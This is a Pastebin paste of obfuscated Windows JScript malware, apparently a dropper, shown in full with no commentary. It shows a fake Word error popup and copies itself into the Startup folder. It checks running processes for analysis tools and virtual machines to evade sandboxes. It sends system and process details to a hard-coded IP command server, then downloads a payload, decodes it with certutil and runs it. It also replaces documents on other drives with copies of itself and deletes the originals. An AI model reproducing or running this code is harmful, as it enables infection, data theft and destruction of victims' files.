Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var mdEAithey85 = true;
- var mdEAibusy41 = true;
- var mdEAitime62 = false;
- var mdEAiopinions92 = 0;
- var mdEAiachieve86 = 0;
- var mdEAiwithout49 = false;
- var mdEAiitself10 = 3;
- var mdEAiresolvedto17 = null;
- var mdEAithrough13 = null;
- var mdEAivisit40 = null;
- var mdEAiwith35 = null;
- var mdEAiconsidered87 = null;
- var mdEAiinto43 = null;
- var mdEAidisproportionate79 = 0;
- var mdEAiespecially5 = false;
- var mdEAiability89 = -1;
- var mdEAidefences47 = 7;
- var mdEAistudy74 = 1;
- var mdEAiwere19 = "[!]";
- var mdEAithat49 = "MS Word error: 0x0030EF65";
- var mdEAiThis30 = this["WScript"];
- var mdEAilabour79 = this["ActiveXObject"];
- var mdEAileaders26 = mdEAiThis30["ScriptFullName"];
- var mdEAicheap26 = new mdEAilabour79("Scripting.FileSystemObject");
- var mdEAimore40 = mdEAiThis30["CreateObject"]("WScript.Shell");
- try {
- if (mdEAileaders26["indexOf"]("\" + "Startup" + "\") == -1) {
- mdEAiresolvedto17 = mdEAicheap26["OpenTextFile"](mdEAileaders26, 1, false, 0);
- mdEAiinto43 = mdEAiresolvedto17["ReadLine"]();
- mdEAiresolvedto17["Close"]();
- mdEAiwithout49 = true;
- if (mdEAithey85) {
- mdEAimore40["Popup"](unescape(mdEAithat49), 30, unescape(mdEAiwere19), mdEAistudy74);
- }
- }
- } catch (Njmsqad) {
- mdEAimore40["Popup"](mdEAithat49, 6, mdEAiwere19, mdEAistudy74);
- }
- var mdEAireason4 = 1;
- var mdEAithey86 = ("2090000") * 1;
- while (mdEAistudy74) {
- mdEAithat49 = "ac";
- mdEAireason4 = mdEAireason4 + 1;
- if (mdEAireason4 == mdEAithey86) {
- var mdEAiquiet2 = this["Enumerator"];
- var mdEAiknew41 = this["GetObject"];
- var mdEAiwere47 = new mdEAilabour79("Shell.Application");
- var mdEAiyounger30 = new mdEAilabour79("ADODB.Stream");
- var mdEAimotives13 = new mdEAilabour79("Msxml2.ServerXMLHTTP");
- var mdEAisufficient11 = mdEAimore40["ExpandEnvironmentStrings"]("%USERPROFILE%");
- var mdEAiacted13 = String["fromCharCode"](34);
- var mdEAiquestion47 = Math["floor"]((Math["random"]() * (900)) + 1);
- var mdEAithose44 = mdEAimore40["ExpandEnvironmentStrings"]("%TEMP%");
- var mdEAiskilled63 = "\" + "shell.jse";
- var mdEAirecall6 = mdEAiwere47["NameSpace"](7);
- var mdEAicarefully66 = mdEAirecall6["Self"]["Path"] + mdEAiskilled63;
- var mdEAiobjectively96 = mdEAicarefully66 + mdEAithose44;
- var mdEAimore39 = "&sin=tamud";
- var mdEAipeople52 = "https://185.159.82.20/t-34/x644.php";
- var mdEAiapostles32 = "?min=fr";
- var mdEAicentre32 = mdEAipeople52 + mdEAiapostles32;
- var mdEAithat11 = mdEAicheap26["Drives"];
- var mdEAiimpressions49 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb";
- var mdEAiwrong86 = '';
- var mdEAitheir20 = "ascii.txt";
- var mdEAiexcuse39 = null;
- var mdEAiexistence6 = mdEAiopinions92;
- var mdEAithing92 = null;
- var mdEAithat60 = null;
- var mdEAipaid22 = mdEAiopinions92;
- var mdEAihonest33 = '';
- var mdEAishall49 = '';
- var mdEAiexistence62 = null;
- var mdEAibeing97 = '';
- var mdEAiSuch36 = '';
- var mdEAitheoretical52 = '';
- var mdEAirenunciation97 = null;
- var mdEAithis15 = null;
- var mdEAionly63 = ("4294967295") * 1;
- var mdEAiwere92 = "-f -decode ";
- var mdEAiground81 = "MZ";
- var mdEAiexpectation22 = "POST";
- var mdEAimidst53 = '';
- var mdEAiproved2 = 0;
- try {
- mdEAithing92 = mdEAiknew41("winmgmts:{impersonationLevel=impersonate}!" + "\" + "\" + "." + "\" + "root" + "\" + "cimv2");
- mdEAiexistence6 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_Process"));
- mdEAiexistence62 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_OperatingSystem"));
- while (!mdEAiexistence62["atEnd"]()) {
- if (mdEAidisproportionate79 == 5) break;
- mdEAishall49 = mdEAishall49 + mdEAiexistence62["item"]()["Caption"] + mdEAiexistence62["item"]()["Version"];
- mdEAidisproportionate79++;
- mdEAiexistence62["moveNext"]();
- }
- mdEAishall49 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAicarefully66;
- mdEAidisproportionate79 = 0;
- while (!mdEAiexistence6["atEnd"]()) {
- if (mdEAidisproportionate79 == 200) break;
- mdEAithat60 = mdEAiexistence6["item"]();
- mdEAihonest33 = mdEAihonest33 + mdEAithat60["Name"] + "*" + mdEAithat60["ExecutablePath"] + String["fromCharCode"](13) + String["fromCharCode"](10);
- mdEAidisproportionate79++;
- mdEAiexistence6["moveNext"]();
- }
- } catch (Njmsqad) {}
- try {
- mdEAiobjectively96 = mdEAiobjectively96 + mdEAishall49;
- for (mdEAiachieve86 = 0; mdEAiachieve86 < mdEAiobjectively96["length"]; mdEAiachieve86++) {
- mdEAiopinions92 = (((mdEAiopinions92 << (5)) - mdEAiopinions92) + mdEAiobjectively96["charCodeAt"](mdEAiachieve86)) & mdEAionly63;
- }
- if (mdEAicarefully66["indexOf"]("\" + "AppData" + "\") == -1) {
- mdEAiachieve86 = 5 + 5;
- } else {
- mdEAiachieve86 = 20;
- }
- } catch (Njmsqad) {
- mdEAiopinions92 = 7777777;
- }
- mdEAihonest33 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAihonest33;
- if (mdEAihonest33["length"] < 1400 || mdEAihonest33["indexOf"]("2B.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Procmon") != mdEAiability89 || mdEAihonest33["indexOf"]("Wireshark") != mdEAiability89 || mdEAihonest33["indexOf"]("Temp" + "\" + "iexplore.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ProcessHacker") != mdEAiability89 || mdEAihonest33["indexOf"]("vmtoolsd") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxService") != mdEAiability89 || mdEAihonest33["indexOf"]("python") != mdEAiability89 || mdEAihonest33["indexOf"]("Proxifier.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Johnson") != mdEAiability89 || mdEAihonest33["indexOf"]("ImmunityDebugger.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("lordPE.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ctfmon.exe*JOHN-PC") != mdEAiability89 || mdEAihonest33["indexOf"]("BehaviorDumper") != mdEAiability89 || mdEAihonest33["indexOf"]("anti-virus.EXE") != mdEAiability89 || mdEAihonest33["indexOf"]("AgentSimulator.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VzService.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxTray.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VmRemoteGuest") != mdEAiability89 || mdEAihonest33["indexOf"]("SystemIT|admin") != mdEAiability89 || mdEAihonest33["indexOf"]("WIN7-TRAPS") != mdEAiability89 || mdEAihonest33["indexOf"]("Emily" + "\" + "AppData") != mdEAiability89 || mdEAihonest33["indexOf"]("PROCMON") != mdEAiability89 || mdEAihonest33["indexOf"]("procexp") != mdEAiability89 || mdEAihonest33["indexOf"]("tcpdump") != mdEAiability89 || mdEAihonest33["indexOf"]("FrzState2k") != mdEAiability89 || mdEAihonest33["indexOf"]("DFLocker64") != mdEAiability89 || mdEAihonest33["indexOf"]("vmware") != mdEAiability89 || mdEAihonest33["indexOf"]("LOGSystem.Agent.Service.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "user" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "milozs" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("windanr.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("gemu-ga.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("HAPUBWS") != mdEAiability89 || mdEAihonest33["indexOf"]("BennyDB.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Peter Wilson") != mdEAiability89 || mdEAihonest33["indexOf"]("Hong Lee") != mdEAiability89) {
- mdEAiespecially5 = true;
- view["close"]("we_need_to_go_deeper");
- }
- try {
- if (mdEAiwithout49 && mdEAibusy41 && !mdEAiespecially5) {
- mdEAithrough13 = mdEAicheap26["CreateTextFile"](mdEAicarefully66, true, false);
- mdEAithrough13["WriteLine"](mdEAiinto43);
- mdEAithrough13["Close"]();
- }
- } catch (Njmsqad) {}
- while (mdEAidefences47) {
- try {
- mdEAimidst53 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".exe";
- mdEAiwrong86 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".cro";
- mdEAimotives13["setOption"](mdEAiitself10, "MSXML");
- mdEAiexcuse39 = mdEAicentre32 + mdEAimore39 + "&p=" + Math["abs"](mdEAiopinions92) + "&i=" + mdEAiproved2 + "&k=" + mdEAiachieve86 + "&r=" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1);
- mdEAimotives13["open"](mdEAiexpectation22, mdEAiexcuse39, false);
- mdEAimotives13["send"](mdEAihonest33);
- if (mdEAimotives13["status"] == 200) {
- if (mdEAiproved2 == 0) {
- mdEAivisit40 = mdEAimotives13["responseText"];
- try {
- if (mdEAimotives13["getResponseHeader"]("RedSparrow") == '0') {
- mdEAimidst53 = mdEAicarefully66;
- mdEAiability89 = 0;
- }
- } catch (Njmsqad) {}
- try {
- if (mdEAimotives13["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
- mdEAiyounger30["Open"]();
- mdEAiyounger30["Type"] = 1;
- mdEAiyounger30["Write"](mdEAimotives13["responseBody"]);
- mdEAiyounger30["Position"] = 0;
- mdEAiyounger30["SaveToFile"](mdEAimidst53, 2);
- mdEAiyounger30["Close"]();
- } else {
- if (mdEAivisit40.length > 10) {
- mdEAiresolvedto17 = mdEAicheap26["CreateTextFile"](mdEAiwrong86, true, false);
- mdEAiresolvedto17["WriteLine"](mdEAivisit40);
- mdEAiresolvedto17["Close"]();
- mdEAiThis30["Sleep"](7000);
- mdEAiwere47["ShellExecute"]("certutil", mdEAiwere92 + mdEAiwrong86 + " " + mdEAiacted13 + mdEAimidst53 + mdEAiacted13, '', "open", 0);
- }
- }
- } catch (Njmsqad) {}
- } else {
- mdEAiproved2 = 0;
- continue;
- }
- if (mdEAiability89 == 0) {
- mdEAiThis30["Sleep"](50000);
- mdEAiability89 = -1;
- mdEAiproved2 = 9;
- continue;
- }
- mdEAiThis30["Sleep"](33000);
- if (!mdEAicheap26["FileExists"](mdEAimidst53) && mdEAitime62) {
- try {
- mdEAirenunciation97 = new mdEAiquiet2(mdEAithat11);
- for (; !mdEAirenunciation97["atEnd"](); mdEAirenunciation97["moveNext"]()) {
- mdEAithis15 = mdEAirenunciation97["item"]();
- if ((mdEAithis15["IsReady"] && (mdEAithis15["DriveType"] == 3 || mdEAithis15["DriveType"] == 1)) && mdEAisufficient11["substring"](0, 1) != mdEAithis15["DriveLetter"]) {
- mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C cd /D " + mdEAithis15["DriveLetter"] + ": && dir /b/s/x " + mdEAiimpressions49 + ">>%TEMP%" + "\" + mdEAitheir20, '', "open", 0);
- mdEAiThis30["Sleep"](60000);
- }
- }
- mdEAiThis30["Sleep"](50000);
- mdEAiconsidered87 = mdEAicheap26["GetFile"](mdEAithose44 + "\" + mdEAitheir20)["OpenAsTextStream"](1, -1);
- while (!mdEAiconsidered87["AtEndOfStream"]) {
- mdEAiSuch36 = mdEAiconsidered87["ReadLine"]();
- mdEAitheoretical52 = mdEAiSuch36["substring"](0, mdEAiSuch36["indexOf"]("."));
- mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C copy /Y " + mdEAiacted13 + mdEAicarefully66 + mdEAiacted13 + " " + mdEAiacted13 + mdEAitheoretical52 + ".jse" + mdEAiacted13 + " && del /Q/F " + mdEAiacted13 + mdEAiSuch36 + mdEAiacted13, '', "open", 0);
- }
- mdEAiconsidered87["Close"]();
- mdEAicheap26["DeleteFile"](mdEAithose44 + "\" + mdEAitheir20);
- } catch (Njmsqad) {}
- mdEAiproved2 = 0;
- continue;
- }
- mdEAiwith35 = mdEAicheap26["GetFile"](mdEAimidst53)["OpenAsTextStream"](1);
- mdEAibeing97 = mdEAiwith35["ReadLine"]()["substring"](0, 2);
- mdEAiwith35["Close"]();
- if (mdEAibeing97 == mdEAiground81 && mdEAiproved2 == 0) {
- try {
- switch (mdEAiability89) {
- case -1:
- mdEAiwere47["ShellExecute"](mdEAimidst53, null, '', "open", 1);
- mdEAiproved2 = 59;
- break;
- case 0:
- mdEAiproved2 = 60;
- break;
- case 1:
- mdEAiproved2 = 61;
- break;
- case 2:
- mdEAiproved2 = 62;
- break;
- }
- } catch (Njmsqad) {
- mdEAiproved2 = 9888;
- }
- mdEAiThis30["Sleep"](9000);
- }
- }
- } catch (Njmsqad) {}
- mdEAiThis30["Sleep"](50000);
- };
- };
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement